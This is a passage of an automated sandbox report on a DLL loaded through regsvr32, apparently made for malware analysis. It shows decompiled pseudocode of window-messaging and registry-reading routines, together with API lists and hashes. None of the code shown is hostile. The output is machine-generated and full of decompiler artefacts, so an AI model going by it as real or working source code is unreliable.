                                                                                                                				E100231D3(_t101 - 0x18, _t103,  *((intOrPtr*)( *(_t101 + 8) - 0xbc)));
                                                                                                                				 *(_t101 - 4) = 0;
                                                                                                                				if( *((intOrPtr*)(_t97 + 0x88)) != 0) {
                                                                                                                					L19:
                                                                                                                					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
                                                                                                                					__eflags =  *(_t101 - 0x14);
                                                                                                                					if( *(_t101 - 0x14) != 0) {
                                                                                                                						_push( *((intOrPtr*)(_t101 - 0x18)));
                                                                                                                						_push(0);
                                                                                                                						E10022A6E();
                                                                                                                					}
                                                                                                                					_t59 = 0;
                                                                                                                					__eflags = 0;
                                                                                                                					L22:
                                                                                                                					return E1003D2BE(_t59);
                                                                                                                				}
                                                                                                                				if( *((intOrPtr*)(_t97 + 0x90)) != 0) {
                                                                                                                					L6:
                                                                                                                					__eflags =  *((intOrPtr*)(_t97 + 0x9c)) -  *(_t101 + 0xc);
                                                                                                                					if( *((intOrPtr*)(_t97 + 0x9c)) !=  *(_t101 + 0xc)) {
                                                                                                                						goto L19;
                                                                                                                					}
                                                                                                                					_t81 = _t97 + 0xac;
                                                                                                                					__imp__#9(_t81);
                                                                                                                					_t63 =  *(_t97 + 0x50);
                                                                                                                					__eflags = _t63;
                                                                                                                					_t85 = 0 | __eflags != 0x00000000;
                                                                                                                					 *(_t101 + 8) = 0;
                                                                                                                					__eflags = __eflags != 0;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						L9:
                                                                                                                						_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x1005f974, _t101 + 8);
                                                                                                                						__eflags = _t64;
                                                                                                                						if(_t64 < 0) {
                                                                                                                							goto L19;
                                                                                                                						}
                                                                                                                						E1003BB70(_t97, _t101 - 0x48, 0, 0x20);
                                                                                                                						E1003BB70(_t97, _t101 - 0x28, 0, 0x10);
                                                                                                                						_t69 =  *(_t101 + 8);
                                                                                                                						_t102 = _t102 + 0x18;
                                                                                                                						__eflags = _t69;
                                                                                                                						_t85 = 0 | __eflags != 0x00000000;
                                                                                                                						__eflags = __eflags != 0;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							goto L8;
                                                                                                                						}
                                                                                                                						_t70 =  *((intOrPtr*)( *_t69 + 0x18))(_t69,  *(_t101 + 0xc), 0x1005fa04, 0, 2, _t101 - 0x28, _t81, _t101 - 0x48, _t101 - 0x10);
                                                                                                                						__eflags =  *(_t101 - 0x44);
                                                                                                                						_t82 = __imp__#6;
                                                                                                                						 *(_t101 + 0xc) = _t70;
                                                                                                                						if( *(_t101 - 0x44) != 0) {
                                                                                                                							 *_t82( *(_t101 - 0x44));
                                                                                                                						}
                                                                                                                						__eflags =  *(_t101 - 0x40);
                                                                                                                						if( *(_t101 - 0x40) != 0) {
                                                                                                                							 *_t82( *(_t101 - 0x40));
                                                                                                                						}
                                                                                                                						__eflags =  *(_t101 - 0x3c);
                                                                                                                						if( *(_t101 - 0x3c) != 0) {
                                                                                                                							 *_t82( *(_t101 - 0x3c));
                                                                                                                						}
                                                                                                                						_t71 =  *(_t101 + 8);
                                                                                                                						 *((intOrPtr*)( *_t71 + 8))(_t71);
                                                                                                                						__eflags =  *(_t101 + 0xc);
                                                                                                                						if( *(_t101 + 0xc) >= 0) {
                                                                                                                							 *((intOrPtr*)(_t97 + 0xa8)) = 1;
                                                                                                                						}
                                                                                                                						goto L19;
                                                                                                                					}
                                                                                                                					L8:
                                                                                                                					_t63 = E1001729E(_t81, _t85, _t97, 0, __eflags);
                                                                                                                					goto L9;
                                                                                                                				}
                                                                                                                				 *(_t101 - 0x68) =  *(_t101 + 0xc);
                                                                                                                				 *((intOrPtr*)(_t101 - 0x6c)) = 2;
                                                                                                                				 *((intOrPtr*)(_t101 - 0x64)) = 0;
                                                                                                                				 *((intOrPtr*)(_t101 - 0x60)) = 0;
                                                                                                                				 *((intOrPtr*)(_t101 - 0x5c)) = 0;
                                                                                                                				 *((intOrPtr*)(_t101 - 0x54)) = 0;
                                                                                                                				 *((intOrPtr*)(_t101 - 0x50)) = 0;
                                                                                                                				 *((intOrPtr*)(_t101 - 0x4c)) = 0;
                                                                                                                				E1002EF82(_t97, _t101 - 0x6c);
                                                                                                                				if( *((intOrPtr*)(_t101 - 0x54)) == 0) {
                                                                                                                					goto L6;
                                                                                                                				}
                                                                                                                				 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
                                                                                                                				_t98 =  *((intOrPtr*)(_t101 - 0x54));
                                                                                                                				if( *(_t101 - 0x14) != 0) {
                                                                                                                					_push( *((intOrPtr*)(_t101 - 0x18)));
                                                                                                                					_push(0);
                                                                                                                					E10022A6E();
                                                                                                                				}
                                                                                                                				_t59 = _t98;
                                                                                                                				goto L22;
                                                                                                                			}
















                                                                                                                0x10031225
                                                                                                                0x1003122d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003122f
                                                                                                                0x10031236
                                                                                                                0x10031239
                                                                                                                0x1003123b
                                                                                                                0x1003123e
                                                                                                                0x1003123f
                                                                                                                0x1003123f
                                                                                                                0x10031244
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeString$_memset$ClearH_prolog3Variant
                                                                                                                • String ID:
                                                                                                                • API String ID: 3574576181-0
                                                                                                                • Opcode ID: 8e800c516fb9f534f7ddac136c4b36199b3b4c6ba972024304678830e82c39ba
                                                                                                                • Instruction ID: 81cc15f29fc27522e7acf18e4fe3af452782b3e5e45194abce79f82709f6e1eb
                                                                                                                • Opcode Fuzzy Hash: 8e800c516fb9f534f7ddac136c4b36199b3b4c6ba972024304678830e82c39ba
                                                                                                                • Instruction Fuzzy Hash: 57415871900229EFCF02DFA0C8859DEBBB9FF08B55F10851AF119AB191CB70AA51CF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 76%
                                                                                                                			E1002602B(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a264, char _a268) {
                                                                                                                				char _v4;
                                                                                                                				intOrPtr _v12;
                                                                                                                				char* _v16;
                                                                                                                				void* _v20;
                                                                                                                				char* _v24;
                                                                                                                				char _v28;
                                                                                                                				long _v32;
                                                                                                                				char _v36;
                                                                                                                				char _v272;
                                                                                                                				char _v280;
                                                                                                                				intOrPtr _v292;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t40;
                                                                                                                				char _t44;
                                                                                                                				void* _t47;
                                                                                                                				void* _t54;
                                                                                                                				char* _t61;
                                                                                                                				void* _t77;
                                                                                                                				void* _t80;
                                                                                                                				void* _t81;
                                                                                                                				intOrPtr _t94;
                                                                                                                				void* _t98;
                                                                                                                				void* _t100;
                                                                                                                				void* _t101;
                                                                                                                				char* _t104;
                                                                                                                
                                                                                                                				_t95 = __edx;
                                                                                                                				_t81 = __ecx;
                                                                                                                				_t79 = __ebx;
                                                                                                                				_t104 =  &_v272;
                                                                                                                				_t40 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_a264 = _t40 ^ _t104;
                                                                                                                				_push(0x18);
                                                                                                                				E1003D1E6(E10053B04, __ebx, __edi, __esi);
                                                                                                                				_t100 = __ecx;
                                                                                                                				_v20 = 0;
                                                                                                                				_v32 = 0;
                                                                                                                				_t44 = E10025EF8(__ecx, __edx);
                                                                                                                				_v28 = _t44;
                                                                                                                				if(_t44 != 0) {
                                                                                                                					do {
                                                                                                                						__eax =  &_v28;
                                                                                                                						_push(__eax);
                                                                                                                						__ecx = __esi;
                                                                                                                						E10025F09();
                                                                                                                						__eflags = __eax - __edi;
                                                                                                                						if(__eax != __edi) {
                                                                                                                							__edx =  *__eax;
                                                                                                                							__ecx = __eax;
                                                                                                                							__eax =  *((intOrPtr*)(__edx + 0xc))(__edi, 0xfffffffc, __edi, __edi);
                                                                                                                						}
                                                                                                                						__eflags = _v28 - __edi;
                                                                                                                					} while (_v28 != __edi);
                                                                                                                				}
                                                                                                                				__eflags =  *(_t100 + 0x54);
                                                                                                                				if( *(_t100 + 0x54) == 0) {
                                                                                                                					L15:
                                                                                                                					 *[fs:0x0] = _v12;
                                                                                                                					_pop(_t98);
                                                                                                                					_pop(_t101);
                                                                                                                					_pop(_t80);
                                                                                                                					_t47 = E1003B437(1, _t80, _a264 ^ _t104, _t95, _t98, _t101);
                                                                                                                					__eflags =  &_a268;
                                                                                                                					return _t47;
                                                                                                                				} else {
                                                                                                                					 *((intOrPtr*)(_t100 + 0x68)) =  *((intOrPtr*)(_t100 + 0x68)) != 0;
                                                                                                                					if( *((intOrPtr*)(_t100 + 0x68)) != 0) {
                                                                                                                						E10005030(_t95, _t104, "Software\\");
                                                                                                                						_v4 = 0;
                                                                                                                						E10003520(0,  *(_t100 + 0x54));
                                                                                                                						_t54 = E10002170( &_v36,  &_v16, 0x100585c4);
                                                                                                                						_v4 = 1;
                                                                                                                						E10002170( &_v24, _t54,  *((intOrPtr*)(_t100 + 0x68)));
                                                                                                                						_v4 = 3;
                                                                                                                						E10001020(_v36 + 0xfffffff0, _t95);
                                                                                                                						_push( &_v24);
                                                                                                                						_push(0x80000001);
                                                                                                                						E10025F1C(_t79, 0, 0x80000001, __eflags);
                                                                                                                						_t61 = RegOpenKeyA(0x80000001, _v16,  &_v20);
                                                                                                                						__eflags = _t61;
                                                                                                                						if(_t61 == 0) {
                                                                                                                							__eflags = RegEnumKeyA(_v20, 0, _t104, 0x104) - 0x103;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								_push( &_v16);
                                                                                                                								_push(0x80000001);
                                                                                                                								E10025F1C(_t79, 0, 0x80000001, __eflags);
                                                                                                                							}
                                                                                                                							RegCloseKey(_v20);
                                                                                                                						}
                                                                                                                						RegQueryValueA(0x80000001, _v24, _t104,  &_v32);
                                                                                                                						E10001020( &(_v24[0xfffffffffffffff0]), _t95);
                                                                                                                						__eflags =  &(_v16[0xfffffffffffffff0]);
                                                                                                                						E10001020( &(_v16[0xfffffffffffffff0]), _t95);
                                                                                                                						goto L15;
                                                                                                                					} else {
                                                                                                                						_push(_t104);
                                                                                                                						_push(_t81);
                                                                                                                						_v280 = 0x1006c938;
                                                                                                                						E1003D2F0( &_v280, 0x1006522c);
                                                                                                                						asm("int3");
                                                                                                                						_push(4);
                                                                                                                						E1003D1E6(E10052A8D, _t79, 0, _t100);
                                                                                                                						_t94 = E1002D12C(0x104);
                                                                                                                						_v292 = _t94;
                                                                                                                						_t77 = 0;
                                                                                                                						_v280 = 0;
                                                                                                                						if(_t94 != 0) {
                                                                                                                							_t77 = E10022AE3(_t94);
                                                                                                                						}
                                                                                                                						return E1003D2BE(_t77);
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1002604A
                                                                                                                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 10026106
                                                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 1002611D
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 10026137
                                                                                                                • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 10026149
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseEnumH_prolog3OpenQueryValue
                                                                                                                • String ID: Software\
                                                                                                                • API String ID: 3878845136-964853688
                                                                                                                • Opcode ID: fe00129859251c3057611a56493832f551f6470be96c541d126e5d60e74498ad
                                                                                                                • Instruction ID: df4787835faf45ff6cc6f620844819c68e58f9b63de8fd5c41c71a224e8fd913
                                                                                                                • Opcode Fuzzy Hash: fe00129859251c3057611a56493832f551f6470be96c541d126e5d60e74498ad
                                                                                                                • Instruction Fuzzy Hash: DB41EF31900259AFDB11DBA4DC81EFFB7B9EF48310F50052AF552E3291DB34AA44CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 96%
                                                                                                                			E100197B9(intOrPtr* __ecx, signed int _a4) {
                                                                                                                				struct HWND__* _v4;
                                                                                                                				struct tagMSG* _v8;
                                                                                                                				int _v12;
                                                                                                                				int _v16;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				struct HWND__* _t42;
                                                                                                                				struct tagMSG* _t43;
                                                                                                                				signed int _t45;
                                                                                                                				void* _t48;
                                                                                                                				void* _t50;
                                                                                                                				int _t53;
                                                                                                                				long _t56;
                                                                                                                				signed int _t62;
                                                                                                                				intOrPtr* _t64;
                                                                                                                				intOrPtr* _t67;
                                                                                                                				void* _t68;
                                                                                                                
                                                                                                                				_t63 = __ecx;
                                                                                                                				_t62 = 1;
                                                                                                                				_t67 = __ecx;
                                                                                                                				_v12 = 1;
                                                                                                                				_v16 = 0;
                                                                                                                				if((_a4 & 0x00000004) == 0 || (E1001D23C(__ecx) & 0x10000000) != 0) {
                                                                                                                					_t62 = 0;
                                                                                                                				}
                                                                                                                				_t42 = GetParent( *(_t67 + 0x20));
                                                                                                                				 *(_t67 + 0x3c) =  *(_t67 + 0x3c) | 0x00000018;
                                                                                                                				_v4 = _t42;
                                                                                                                				_t43 = E1002320F(0);
                                                                                                                				_t68 = UpdateWindow;
                                                                                                                				_v8 = _t43;
                                                                                                                				while(1) {
                                                                                                                					L14:
                                                                                                                					_t73 = _v12;
                                                                                                                					if(_v12 == 0) {
                                                                                                                						goto L15;
                                                                                                                					}
                                                                                                                					__eflags = PeekMessageA(_v8, 0, 0, 0, 0);
                                                                                                                					if(__eflags != 0) {
                                                                                                                						while(1) {
                                                                                                                							L15:
                                                                                                                							_t45 = E10023728(_t63, 0, _t67, _t73);
                                                                                                                							if(_t45 == 0) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							if(_t62 != 0) {
                                                                                                                								_t53 = _v8->message;
                                                                                                                								if(_t53 == 0x118 || _t53 == 0x104) {
                                                                                                                									E1001D35E(_t67, 1);
                                                                                                                									UpdateWindow( *(_t67 + 0x20));
                                                                                                                									_t62 = 0;
                                                                                                                								}
                                                                                                                							}
                                                                                                                							_t64 = _t67;
                                                                                                                							_t48 =  *((intOrPtr*)( *_t67 + 0x80))();
                                                                                                                							_t79 = _t48;
                                                                                                                							if(_t48 == 0) {
                                                                                                                								_t39 = _t67 + 0x3c;
                                                                                                                								 *_t39 =  *(_t67 + 0x3c) & 0xffffffe7;
                                                                                                                								__eflags =  *_t39;
                                                                                                                								return  *((intOrPtr*)(_t67 + 0x44));
                                                                                                                							} else {
                                                                                                                								_t50 = E100235C0(_t62, _t64, 0, _t67, _t68, _t79, _v8);
                                                                                                                								_pop(_t63);
                                                                                                                								if(_t50 != 0) {
                                                                                                                									_v12 = 1;
                                                                                                                									_v16 = 0;
                                                                                                                								}
                                                                                                                								if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
                                                                                                                									continue;
                                                                                                                								} else {
                                                                                                                									goto L14;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_push(0);
                                                                                                                						E10025696();
                                                                                                                						return _t45 | 0xffffffff;
                                                                                                                					}
                                                                                                                					__eflags = _t62;
                                                                                                                					if(_t62 != 0) {
                                                                                                                						_t63 = _t67;
                                                                                                                						E1001D35E(_t67, 1);
                                                                                                                						UpdateWindow( *(_t67 + 0x20));
                                                                                                                						_t62 = 0;
                                                                                                                						__eflags = 0;
                                                                                                                					}
                                                                                                                					__eflags = _a4 & 0x00000001;
                                                                                                                					if((_a4 & 0x00000001) == 0) {
                                                                                                                						__eflags = _v4;
                                                                                                                						if(_v4 != 0) {
                                                                                                                							__eflags = _v16;
                                                                                                                							if(_v16 == 0) {
                                                                                                                								SendMessageA(_v4, 0x121, 0,  *(_t67 + 0x20));
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					__eflags = _a4 & 0x00000002;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						L13:
                                                                                                                						_v12 = 0;
                                                                                                                						continue;
                                                                                                                					} else {
                                                                                                                						_t56 = SendMessageA( *(_t67 + 0x20), 0x36a, 0, _v16);
                                                                                                                						_v16 = _v16 + 1;
                                                                                                                						__eflags = _t56;
                                                                                                                						if(__eflags != 0) {
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						goto L13;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				goto L15;
                                                                                                                			}























                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 100197E7
                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001980E
                                                                                                                • UpdateWindow.USER32 ref: 10019828
                                                                                                                • SendMessageA.USER32 ref: 1001984C
                                                                                                                • SendMessageA.USER32 ref: 10019866
                                                                                                                • UpdateWindow.USER32 ref: 100198AC
                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 100198E0
                                                                                                                  • Part of subcall function 1001D23C: GetWindowLongA.USER32(?,000000F0), ref: 1001D247
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                • String ID:
                                                                                                                • API String ID: 2853195852-0
                                                                                                                • Opcode ID: 6e53de550b6b7c23bc77ca9b403ca520573940f5afa320a098b54db7afd03077
                                                                                                                • Instruction ID: 4b2ea10294a732189e16f04b93a982dac3e7738e79e70afb51cbaa69b3d0715c
                                                                                                                • Opcode Fuzzy Hash: 6e53de550b6b7c23bc77ca9b403ca520573940f5afa320a098b54db7afd03077
                                                                                                                • Instruction Fuzzy Hash: 1941C2306087419BE721DF618C88A1BBBF4FFC6B94F100A2DF5819A0A1DB72D885CB52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 79%
                                                                                                                			E10025EB2(int __ebx, long __ecx, struct HWND__* __edi) {
                                                                                                                				long _v4;
                                                                                                                				char _v28;
                                                                                                                				intOrPtr _v40;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				long _t20;
                                                                                                                				long _t21;
                                                                                                                				struct HWND__* _t22;
                                                                                                                				long _t23;
                                                                                                                				struct HWND__* _t24;
                                                                                                                				long _t25;
                                                                                                                				struct HWND__* _t26;
                                                                                                                				void* _t33;
                                                                                                                				void* _t35;
                                                                                                                				long _t39;
                                                                                                                				long _t41;
                                                                                                                				intOrPtr _t43;
                                                                                                                				struct HWND__* _t47;
                                                                                                                				struct HWND__* _t49;
                                                                                                                				long _t51;
                                                                                                                				long _t53;
                                                                                                                
                                                                                                                				_t46 = __edi;
                                                                                                                				_t39 = __ecx;
                                                                                                                				_t37 = __ebx;
                                                                                                                				if( *((intOrPtr*)(__ecx + 0x78)) == 0) {
                                                                                                                					_t51 = E10004700();
                                                                                                                					__eflags = _t51;
                                                                                                                					if(_t51 != 0) {
                                                                                                                						_t20 =  *((intOrPtr*)( *_t51 + 0x120))();
                                                                                                                						__eflags = _t20;
                                                                                                                						_t41 = _t51;
                                                                                                                						_pop(_t52);
                                                                                                                						if(_t20 != 0) {
                                                                                                                							_t53 = _t41;
                                                                                                                							_t21 =  *(_t53 + 0x64);
                                                                                                                							__eflags = _t21;
                                                                                                                							if(_t21 == 0) {
                                                                                                                								_pop(_t52);
                                                                                                                								goto L12;
                                                                                                                							} else {
                                                                                                                								__eflags = _t21 - 0x3f107;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									_t35 = E10023187(__ebx, __edi, _t53, __eflags);
                                                                                                                									_t21 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t35 + 4)))) + 0xac))( *(_t53 + 0x64), 1);
                                                                                                                								}
                                                                                                                								return _t21;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							L12:
                                                                                                                							_push(_t41);
                                                                                                                							_push(_t37);
                                                                                                                							_push(0);
                                                                                                                							_push(_t52);
                                                                                                                							_push(_t46);
                                                                                                                							_v4 = _t41;
                                                                                                                							_t22 = GetCapture();
                                                                                                                							_t51 = SendMessageA;
                                                                                                                							_t37 = 0x365;
                                                                                                                							while(1) {
                                                                                                                								_t47 = _t22;
                                                                                                                								__eflags = _t47;
                                                                                                                								if(_t47 == 0) {
                                                                                                                									break;
                                                                                                                								}
                                                                                                                								_t23 = SendMessageA(_t47, _t37, 0, 0);
                                                                                                                								__eflags = _t23;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									L27:
                                                                                                                									return _t23;
                                                                                                                								} else {
                                                                                                                									_t22 = E1001B030(_t41, _t47, __eflags, _t47);
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                								goto L33;
                                                                                                                							}
                                                                                                                							_t24 = GetFocus();
                                                                                                                							while(1) {
                                                                                                                								_t46 = _t24;
                                                                                                                								__eflags = _t46;
                                                                                                                								if(_t46 == 0) {
                                                                                                                									break;
                                                                                                                								}
                                                                                                                								_t23 = SendMessageA(_t46, _t37, 0, 0);
                                                                                                                								__eflags = _t23;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									goto L27;
                                                                                                                								} else {
                                                                                                                									_t24 = E1001B030(_t41, _t46, __eflags, _t46);
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                								goto L33;
                                                                                                                							}
                                                                                                                							_t39 = _v4;
                                                                                                                							_t25 = E1001B075(_t37, _t39, _t46);
                                                                                                                							__eflags = _t25;
                                                                                                                							if(_t25 != 0) {
                                                                                                                								_t26 = GetLastActivePopup( *(_t25 + 0x20));
                                                                                                                								while(1) {
                                                                                                                									_t49 = _t26;
                                                                                                                									__eflags = _t49;
                                                                                                                									_push(0);
                                                                                                                									if(_t49 == 0) {
                                                                                                                										break;
                                                                                                                									}
                                                                                                                									_t23 = SendMessageA(_t49, _t37, 0, ??);
                                                                                                                									__eflags = _t23;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										_t26 = E1001B030(_t39, _t49, __eflags, _t49);
                                                                                                                										continue;
                                                                                                                									}
                                                                                                                									goto L27;
                                                                                                                								}
                                                                                                                								_t23 = SendMessageA( *(_v4 + 0x20), 0x111, 0xe147, ??);
                                                                                                                								goto L27;
                                                                                                                							} else {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						L1:
                                                                                                                						_push(0);
                                                                                                                						_push(_t39);
                                                                                                                						_v28 = 0x1006c938;
                                                                                                                						E1003D2F0( &_v28, 0x1006522c);
                                                                                                                						asm("int3");
                                                                                                                						_push(4);
                                                                                                                						E1003D1E6(E10052A8D, _t37, _t46, _t51);
                                                                                                                						_t43 = E1002D12C(0x104);
                                                                                                                						_v40 = _t43;
                                                                                                                						_t33 = 0;
                                                                                                                						_v28 = 0;
                                                                                                                						if(_t43 != 0) {
                                                                                                                							_t33 = E10022AE3(_t43);
                                                                                                                						}
                                                                                                                						return E1003D2BE(_t33);
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					__eflags = __eax - 0x3f107;
                                                                                                                					if(__eax != 0x3f107) {
                                                                                                                						return  *((intOrPtr*)( *__ecx + 0xac))(__eax, 1);
                                                                                                                					}
                                                                                                                					return __eax;
                                                                                                                				}
                                                                                                                				L33:
                                                                                                                			}
























                                                                                                                0x00000000
                                                                                                                0x1003581a
                                                                                                                0x00000000
                                                                                                                0x10035817
                                                                                                                0x10035825
                                                                                                                0x10035829
                                                                                                                0x1003582e
                                                                                                                0x10035830
                                                                                                                0x1003583a
                                                                                                                0x10035851
                                                                                                                0x10035851
                                                                                                                0x10035853
                                                                                                                0x10035855
                                                                                                                0x10035856
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10035845
                                                                                                                0x10035847
                                                                                                                0x10035849
                                                                                                                0x1003584c
                                                                                                                0x00000000
                                                                                                                0x1003584c
                                                                                                                0x00000000
                                                                                                                0x10035849
                                                                                                                0x10035869
                                                                                                                0x00000000
                                                                                                                0x10035832
                                                                                                                0x00000000
                                                                                                                0x10035832
                                                                                                                0x10035830
                                                                                                                0x10025ed8
                                                                                                                0x1001729e
                                                                                                                0x1001729e
                                                                                                                0x100172a1
                                                                                                                0x100172ab
                                                                                                                0x100172b2
                                                                                                                0x100172b7
                                                                                                                0x100172b8
                                                                                                                0x100172bf
                                                                                                                0x100172ce
                                                                                                                0x100172d0
                                                                                                                0x100172d3
                                                                                                                0x100172d7
                                                                                                                0x100172da
                                                                                                                0x100172dc
                                                                                                                0x100172dc
                                                                                                                0x100172e6
                                                                                                                0x100172e6
                                                                                                                0x10025eb9
                                                                                                                0x10025eb9
                                                                                                                0x10025ebe
                                                                                                                0x00000000
                                                                                                                0x10025ec5
                                                                                                                0x10025ecb
                                                                                                                0x10025ecb
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                                                                                                • String ID:
                                                                                                                • API String ID: 3219385341-0
                                                                                                                • Opcode ID: 125fe17d3a65532fd924afd3d79837bb38bfa8aadda630246eae324e1f7d9d47
                                                                                                                • Instruction ID: 8c0562f11bf6b8102d91fa625b09d924d8d0b98152d8301606d7d9821aad4bd6
                                                                                                                • Opcode Fuzzy Hash: 125fe17d3a65532fd924afd3d79837bb38bfa8aadda630246eae324e1f7d9d47
                                                                                                                • Instruction Fuzzy Hash: B9310275204216AFDA12DB24DC84E6F76EDEB496C7F220439F801EB160DF33DC4196A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10019D44(intOrPtr* __ecx) {
                                                                                                                				struct HWND__* _v40;
                                                                                                                				struct HWND__* _v44;
                                                                                                                				intOrPtr _v48;
                                                                                                                				void* _v52;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				long _t43;
                                                                                                                				struct HWND__* _t48;
                                                                                                                				long _t61;
                                                                                                                				intOrPtr* _t63;
                                                                                                                				signed int _t64;
                                                                                                                				void* _t69;
                                                                                                                				intOrPtr _t71;
                                                                                                                				intOrPtr* _t72;
                                                                                                                
                                                                                                                				_t72 = __ecx;
                                                                                                                				_t69 = E10023206();
                                                                                                                				if(_t69 != 0) {
                                                                                                                					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
                                                                                                                						 *((intOrPtr*)(_t69 + 0x20)) = 0;
                                                                                                                					}
                                                                                                                					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
                                                                                                                						 *((intOrPtr*)(_t69 + 0x24)) = 0;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t63 =  *((intOrPtr*)(_t72 + 0x48));
                                                                                                                				if(_t63 != 0) {
                                                                                                                					 *((intOrPtr*)( *_t63 + 0x50))();
                                                                                                                					 *((intOrPtr*)(_t72 + 0x48)) = 0;
                                                                                                                				}
                                                                                                                				_t64 =  *(_t72 + 0x4c);
                                                                                                                				if(_t64 != 0) {
